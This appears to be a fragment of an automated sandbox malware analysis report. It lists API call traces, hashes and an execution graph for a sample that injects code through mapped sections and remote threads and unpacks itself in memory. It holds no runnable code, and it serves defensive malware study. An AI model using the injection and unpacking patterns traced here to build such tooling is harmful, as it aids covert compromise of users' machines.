                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DFA5B7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DF7000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2df7000_wBgwzVbZuV.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 75b69b4c2178a2487b395e89cfc4186c5634c4d4835b0d00773032a60770f224
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: 85112B79A00208EFDB41DF98C985E98BBF5EF08350F058094FA489B361D371EA90DF94
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectSleepView
                                                              • String ID:
                                                              • API String ID: 1885482327-0
                                                              • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                              • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                              • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                              • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                              APIs
                                                              • LocalAlloc.KERNELBASE(00000000,02B17CDC,00415DED), ref: 00415778
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: AllocLocal
                                                              • String ID:
                                                              • API String ID: 3494564517-0
                                                              • Opcode ID: 491b2396958e246e7e1f57a1d5fd83289a83e0f0b88f12e6db4e963f9079e42a
                                                              • Instruction ID: c7cd43120ea3207c5deb018b1e7389296927365904e67ce4adcfa047d92e18f4
                                                              • Opcode Fuzzy Hash: 491b2396958e246e7e1f57a1d5fd83289a83e0f0b88f12e6db4e963f9079e42a
                                                              • Instruction Fuzzy Hash: 5BC02B70847282CFDB0A8B3094080E67EE0E6DF2427A40CEDC5C3C70A1DF16054EDB04
                                                              APIs
                                                              • LocalAlloc.KERNELBASE(00000000,02B17CDC,00415DED), ref: 00415778
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: AllocLocal
                                                              • String ID:
                                                              • API String ID: 3494564517-0
                                                              • Opcode ID: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
                                                              • Instruction ID: 6131ea327b8c01d7d03da24dd51081d073e1987c8407c645eead08220222526f
                                                              • Opcode Fuzzy Hash: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
                                                              • Instruction Fuzzy Hash: 36B092B09822009FE200CB50E804B117BA8A308242F404450F505C3140DF205810AA14
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2c30000_wBgwzVbZuV.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$GetProcAddress.$l
                                                              • API String ID: 0-2784972518
                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction ID: baf3e2fce7bdcc9cc6df0f9f84aab837d52465ef4d8e03c4d44481167807498e
                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction Fuzzy Hash: 993138B6900709DFDB11CF99C880AAEBBF9FF48324F15444AD841AB210D771EA45CFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DF7000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2df7000_wBgwzVbZuV.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction ID: 57c78f39569a2ea11449b0a547ab65cdbdd8d874aa8474091e383956daa62827
                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction Fuzzy Hash: 96115E72340100AFD794DF59DCC1FA673EAEB89364B2A8065EE08CB355D676EC42CB64
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                              • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                              • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                              • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                              • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                              • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                              • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2c30000_wBgwzVbZuV.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction ID: 56441237cd5c039f5838cb6c375b9abb1796c206f619cba4e92d69c5b3f6c9d6
                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction Fuzzy Hash: C101A277B106048FDF22CF24C804BEA33E5FBC6216F4548A5D90A97281E774A941CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                              • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                              • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                              • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                              • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                              • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                              • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                              • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                              • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                              • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                              • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                              • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                              • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B
                                                              APIs
                                                              • BuildCommDCBA.KERNEL32(00000000,?), ref: 0041599D
                                                              • WritePrivateProfileStringA.KERNEL32(00417380,0041734C,00417328,00417314), ref: 004159C1
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004159C9
                                                              • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A11
                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A20
                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: BuildCalendarCommEnvironmentFreeInfoNameObjectOpenPathPrivateProfileShortStringStringsWrite
                                                              • String ID: -
                                                              • API String ID: 1791614364-2547889144
                                                              • Opcode ID: 1a6b412cbcf8fd9bd43a67c6afaa262548802305dd34979990a078a0d8af13d4
                                                              • Instruction ID: 5368a2a332436176f0270f6e324495ff1ab7250c8f8a8be8252ed3b816e40977
                                                              • Opcode Fuzzy Hash: 1a6b412cbcf8fd9bd43a67c6afaa262548802305dd34979990a078a0d8af13d4
                                                              • Instruction Fuzzy Hash: ED215B70A84308EBD750CF54DC86FD97BB4EB48761F1180A5FA49AA1C0CE7849C49B9A
                                                              APIs
                                                              • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A11
                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A20
                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A31
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: CalendarInfoNameObjectOpenPathShort
                                                              • String ID: -
                                                              • API String ID: 2381848886-2547889144
                                                              • Opcode ID: 5cb3077d0ae9ce70326b3e9a9f23cbc4277cbfe19918473db3a624e41028dd7a
                                                              • Instruction ID: 0db35e2b396c7aacfab1ac635380de6c7ec9f3e99e7bba80867eae6dc532c324
                                                              • Opcode Fuzzy Hash: 5cb3077d0ae9ce70326b3e9a9f23cbc4277cbfe19918473db3a624e41028dd7a
                                                              • Instruction Fuzzy Hash: 3701F931A84204DADB708F50DC82BD97BB4FB44765F124195F6887F1C0CE7419C4DB89
                                                              APIs
                                                              • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415AA4
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415ABF
                                                              • HeapDestroy.KERNEL32(00000000), ref: 00415ADE
                                                              • GetNumaProcessorNode.KERNEL32(00000000,00000000), ref: 00415AE8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd
                                                              Similarity
                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                              • String ID:
                                                              • API String ID: 4159173863-0
                                                              • Opcode ID: 3cf05308c2aadfedbc980055cb1876fd0d22092802d4cae8296a48a7dc0a4015
                                                              • Instruction ID: 9b8f197d1e03404965dc2a48b96bd0ad9da3adac25fcf19301518012742e0a15
                                                              • Opcode Fuzzy Hash: 3cf05308c2aadfedbc980055cb1876fd0d22092802d4cae8296a48a7dc0a4015
                                                              • Instruction Fuzzy Hash: 5B01A270A80608EFE750EBA4EC85BDA77B8EB0C356F41403AF605D7280DE7459448F9A

                                                              Execution Graph

                                                              Execution Coverage:9.5%
                                                              Dynamic/Decrypted Code Coverage:29.7%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:175
                                                              Total number of Limit Nodes:7
                                                              execution_graph 3395 402e40 3397 402e37 3395->3397 3398 402edf 3397->3398 3399 4018e6 3397->3399 3400 4018f5 3399->3400 3401 40192e Sleep 3400->3401 3402 401949 3401->3402 3404 40195a 3402->3404 3405 401514 3402->3405 3404->3398 3406 401524 3405->3406 3407 4015c4 NtDuplicateObject 3406->3407 3412 4016e0 3406->3412 3408 4015e1 NtCreateSection 3407->3408 3407->3412 3409 401661 NtCreateSection 3408->3409 3410 401607 NtMapViewOfSection 3408->3410 3411 40168d 3409->3411 3409->3412 3410->3409 3413 40162a NtMapViewOfSection 3410->3413 3411->3412 3414 401697 NtMapViewOfSection 3411->3414 3412->3404 3413->3409 3415 401648 3413->3415 3414->3412 3416 4016be NtMapViewOfSection 3414->3416 3415->3409 3416->3412 3417 415f00 3420 415b00 3417->3420 3419 415f05 3421 415b0d 3420->3421 3422 415cf7 3421->3422 3423 415be7 InterlockedCompareExchange ReadConsoleW FindAtomW GetConsoleMode SearchPathA 3421->3423 3424 415d05 SetCommState 3422->3424 3428 415d1e 3422->3428 3425 415c41 7 API calls 3423->3425 3424->3422 3426 415ce1 PulseEvent 3425->3426 3427 415ce8 3425->3427 3426->3427 3427->3422 3429 415de8 3428->3429 3430 415d2b 7 API calls 3428->3430 3443 415770 3429->3443 3437 415dcb 3430->3437 3434 415ded LoadLibraryA 3445 4157a0 GetModuleHandleW GetProcAddress VirtualProtect 3434->3445 3435 415e3d 3446 415a70 3435->3446 3437->3429 3438 415e42 3439 415e7d InterlockedDecrement 3438->3439 3440 415e93 3438->3440 3439->3438 3441 415eb2 GetFileAttributesA 3440->3441 3442 415ec2 3440->3442 3441->3440 3442->3419 3444 415778 LocalAlloc 3443->3444 3444->3434 3445->3435 3447 415a99 QueryDosDeviceW 3446->3447 3448 415aaa 3446->3448 3447->3448 3457 415930 3448->3457 3451 415ac5 3460 415970 3451->3460 3452 415abd FreeEnvironmentStringsA 3452->3451 3455 415adc HeapDestroy GetNumaProcessorNode 3456 415aee 3455->3456 3456->3438 3458 415941 FatalAppExitA GetModuleHandleA 3457->3458 3459 415953 3457->3459 3458->3459 3459->3451 3459->3452 3461 4159a5 3460->3461 3462 415994 BuildCommDCBA 3460->3462 3463 4159cf 3461->3463 3464 4159ad WritePrivateProfileStringA FreeEnvironmentStringsA 3461->3464 3462->3463 3465 415a3c 3463->3465 3467 415a09 SetCalendarInfoW OpenJobObjectA GetShortPathNameW 3463->3467 3468 415960 3463->3468 3464->3463 3465->3455 3465->3456 3467->3463 3471 4158f0 3468->3471 3472 415919 3471->3472 3473 41590c SetEvent 3471->3473 3472->3463 3473->3472 3547 2c70005 3552 2c7092b GetPEB 3547->3552 3549 2c70030 3554 2c7003c 3549->3554 3553 2c70972 3552->3553 3553->3549 3555 2c70049 3554->3555 3556 2c70e0f 2 API calls 3555->3556 3557 2c70223 3556->3557 3558 2c70d90 GetPEB 3557->3558 3559 2c70238 VirtualAlloc 3558->3559 3560 2c70265 3559->3560 3561 2c702ce VirtualProtect 3560->3561 3563 2c7030b 3561->3563 3562 2c70439 VirtualFree 3564 2c704be LoadLibraryA 3562->3564 3563->3562 3566 2c708c7 3564->3566 3573 401542 3574 40153b 3573->3574 3575 4015c4 NtDuplicateObject 3574->3575 3576 4016e0 3574->3576 3575->3576 3577 4015e1 NtCreateSection 3575->3577 3578 401661 NtCreateSection 3577->3578 3579 401607 NtMapViewOfSection 3577->3579 3578->3576 3580 40168d 3578->3580 3579->3578 3581 40162a NtMapViewOfSection 3579->3581 3580->3576 3582 401697 NtMapViewOfSection 3580->3582 3581->3578 3583 401648 3581->3583 3582->3576 3584 4016be NtMapViewOfSection 3582->3584 3583->3578 3584->3576 3567 2c70001 3568 2c70005 3567->3568 3569 2c7092b GetPEB 3568->3569 3570 2c70030 3569->3570 3571 2c7003c 7 API calls 3570->3571 3572 2c70038 3571->3572 3585 415747 3586 415778 LocalAlloc 3585->3586 3587 41574c 3585->3587 3587->3586 3635 402dd0 3636 402ddc 3635->3636 3637 4018e6 8 API calls 3636->3637 3638 402edf 3636->3638 3637->3638 3528 4018f1 3529 4018f6 3528->3529 3530 40192e Sleep 3529->3530 3531 401949 3530->3531 3532 401514 7 API calls 3531->3532 3533 40195a 3531->3533 3532->3533 3512 2d29ee1 3513 2d29eef 3512->3513 3514 2d2a68f 3 API calls 3513->3514 3515 2d29f07 3514->3515 3622 401915 3623 4018c6 3622->3623 3624 40191a 3622->3624 3625 40192e Sleep 3624->3625 3626 401949 3625->3626 3627 401514 7 API calls 3626->3627 3628 40195a 3626->3628 3627->3628 3474 402f97 3475 4030ee 3474->3475 3476 402fc1 3474->3476 3476->3475 3477 40307c RtlCreateUserThread NtTerminateProcess 3476->3477 3477->3475 3639 4159d9 3640 4159e0 3639->3640 3641 415960 SetEvent 3640->3641 3642 415a09 SetCalendarInfoW OpenJobObjectA GetShortPathNameW 3640->3642 3643 415a3c 3640->3643 3641->3640 3642->3640 3478 2c7003c 3479 2c70049 3478->3479 3491 2c70e0f SetErrorMode SetErrorMode 3479->3491 3484 2c70265 3485 2c702ce VirtualProtect 3484->3485 3487 2c7030b 3485->3487 3486 2c70439 VirtualFree 3488 2c704be LoadLibraryA 3486->3488 3487->3486 3490 2c708c7 3488->3490 3492 2c70223 3491->3492 3493 2c70d90 3492->3493 3494 2c70dad 3493->3494 3495 2c70dbb GetPEB 3494->3495 3496 2c70238 VirtualAlloc 3494->3496 3495->3496 3496->3484 3612 402d7b 3613 402d38 3612->3613 3613->3612 3614 4018e6 8 API calls 3613->3614 3615 402dc7 3613->3615 3614->3615 3497 2d29eef 3498 2d29efe 3497->3498 3501 2d2a68f 3498->3501 3506 2d2a6aa 3501->3506 3502 2d2a6b3 CreateToolhelp32Snapshot 3503 2d2a6cf Module32First 3502->3503 3502->3506 3504 2d29f07 3503->3504 3505 2d2a6de 3503->3505 3508 2d2a34e 3505->3508 3506->3502 3506->3503 3509 2d2a379 3508->3509 3510 2d2a3c2 3509->3510 3511 2d2a38a VirtualAlloc 3509->3511 3510->3510 3511->3510 3534 4014fe 3535 401506 3534->3535 3536 401531 3534->3536 3537 4015c4 NtDuplicateObject 3536->3537 3546 4016e0 3536->3546 3538 4015e1 NtCreateSection 3537->3538 3537->3546 3539 401661 NtCreateSection 3538->3539 3540 401607 NtMapViewOfSection 3538->3540 3541 40168d 3539->3541 3539->3546 3540->3539 3542 40162a NtMapViewOfSection 3540->3542 3543 401697 NtMapViewOfSection 3541->3543 3541->3546 3542->3539 3544 401648 3542->3544 3545 4016be NtMapViewOfSection 3543->3545 3543->3546 3544->3539 3545->3546

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 415b00-415b28 2 415b30-415b37 0->2 3 415b39-415b3b 2->3 4 415b3f-415b45 2->4 3->4 5 415b47-415b51 4->5 6 415b56-415b60 4->6 5->6 7 415b62-415b91 6->7 8 415b9b-415ba2 6->8 7->8 8->2 9 415ba4-415bac 8->9 11 415bb0-415bb6 9->11 12 415bc4-415bcb 11->12 13 415bb8-415bbe 11->13 14 415bd1-415bd8 12->14 15 415bcd 12->15 13->12 14->11 16 415bda-415be1 14->16 15->14 17 415cf7-415d03 16->17 18 415be7-415cdf InterlockedCompareExchange ReadConsoleW FindAtomW GetConsoleMode SearchPathA GetDefaultCommConfigA MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA GetSystemTimeAdjustment 16->18 19 415d05-415d13 SetCommState 17->19 21 415ce1-415ce2 PulseEvent 18->21 22 415ce8-415cf4 18->22 24 415d15-415d1c 19->24 25 415d1e-415d25 19->25 21->22 22->17 24->19 24->25 26 415de8-415df7 call 415770 25->26 27 415d2b-415de5 GetConsoleAliasesLengthW GetStringTypeExW GetComputerNameW GetTimeFormatW GetFileAttributesA GetConsoleAliasExesLengthA GetBinaryType 25->27 33 415df9-415e0a 26->33 34 415e2d-415e38 LoadLibraryA call 4157a0 26->34 27->26 35 415e10-415e20 33->35 40 415e3d-415e4e call 415a70 34->40 38 415e22 35->38 39 415e28-415e2b 35->39 38->39 39->34 39->35 44 415e50-415e57 40->44 46 415e67-415e6d 44->46 47 415e59-415e63 44->47 49 415e74-415e7b 46->49 50 415e6f call 415790 46->50 47->46 52 415e8a-415e91 49->52 53 415e7d-415e84 InterlockedDecrement 49->53 50->49 52->44 55 415e93-415e9d 52->55 53->52 56 415ea0-415eb0 55->56 57 415eb2-415eb7 GetFileAttributesA 56->57 58 415ebd-415ec0 56->58 57->58 58->56 59 415ec2-415ecd 58->59 60 415ed0-415ed5 59->60 61 415ed7-415edd 60->61 62 415edf-415ee5 60->62 61->62 63 415ee7-415ef4 61->63 62->60 62->63
                                                              APIs
                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415BF2
                                                              • ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00415BFF
                                                              • FindAtomW.KERNEL32(00000000), ref: 00415C06
                                                              • GetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C0E
                                                              • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415C26
                                                              • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00415C4D
                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00415C55
                                                              • GetVersionExW.KERNEL32(?), ref: 00415C62
                                                              • DisconnectNamedPipe.KERNEL32(?), ref: 00415C75
                                                              • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415CBA
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415CC9
                                                              • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415CD2
                                                              • PulseEvent.KERNEL32(00000000), ref: 00415CE2
                                                              • SetCommState.KERNELBASE(00000000,00000000), ref: 00415D09
                                                              • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00415D3A
                                                              • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415D4B
                                                              • GetComputerNameW.KERNEL32(?,?), ref: 00415D5F
                                                              • GetTimeFormatW.KERNEL32(00000000,00000000,?,004173C0,?,00000000), ref: 00415D9F
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00415DA6
                                                              • GetConsoleAliasExesLengthA.KERNEL32 ref: 00415DAC
                                                              • GetBinaryType.KERNEL32(004173D8,?), ref: 00415DBE
                                                              • LoadLibraryA.KERNELBASE(004173E8), ref: 00415E32
                                                              • InterlockedDecrement.KERNEL32(?), ref: 00415E84
                                                              • GetFileAttributesA.KERNEL32(004173F4), ref: 00415EB7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd
                                                              Similarity
                                                              • API ID: Console$File$AttributesCommInterlockedLengthNameReadTimeType$AdjustmentAliasAliasesAtomBinaryCompareComputerConfigDecrementDefaultDisconnectEventExchangeExesFindFormatLibraryLoadModeModuleMoveNamedOutputPathPipePulseSearchStateStringSystemVersion
                                                              • String ID: k`$}$
                                                              • API String ID: 723190256-956986773
                                                              • Opcode ID: 8b7da9863702e3dcd0db57a90b470b456827346f47e57f256fa4e14a1f125c19
                                                              • Instruction ID: 59ac31373c954154000cefc7af6afdb20c2223af4aecfae594a4346f9e797540
                                                              • Opcode Fuzzy Hash: 8b7da9863702e3dcd0db57a90b470b456827346f47e57f256fa4e14a1f125c19
                                                              • Instruction Fuzzy Hash: 97A1C171941624DFC724DB61EC48EDB7B79EF8D340F4180AAF609A7250DB385A81CFA9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 150 401514-401533 152 401524-40152f 150->152 153 401536-40156e call 401193 150->153 152->153 162 401570 153->162 163 401573-401578 153->163 162->163 165 401898-4018a0 163->165 166 40157e-40158f 163->166 165->163 171 4018a5-4018b7 165->171 169 401595-4015be 166->169 170 401896 166->170 169->170 180 4015c4-4015db NtDuplicateObject 169->180 170->171 177 4018c5 171->177 178 4018bc-4018e3 call 401193 171->178 177->178 180->170 182 4015e1-401605 NtCreateSection 180->182 184 401661-401687 NtCreateSection 182->184 185 401607-401628 NtMapViewOfSection 182->185 184->170 186 40168d-401691 184->186 185->184 188 40162a-401646 NtMapViewOfSection 185->188 186->170 189 401697-4016b8 NtMapViewOfSection 186->189 188->184 191 401648-40165e 188->191 189->170 192 4016be-4016da NtMapViewOfSection 189->192 191->184 192->170 194 4016e0 call 4016e5 192->194
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                              Memory Dump Source
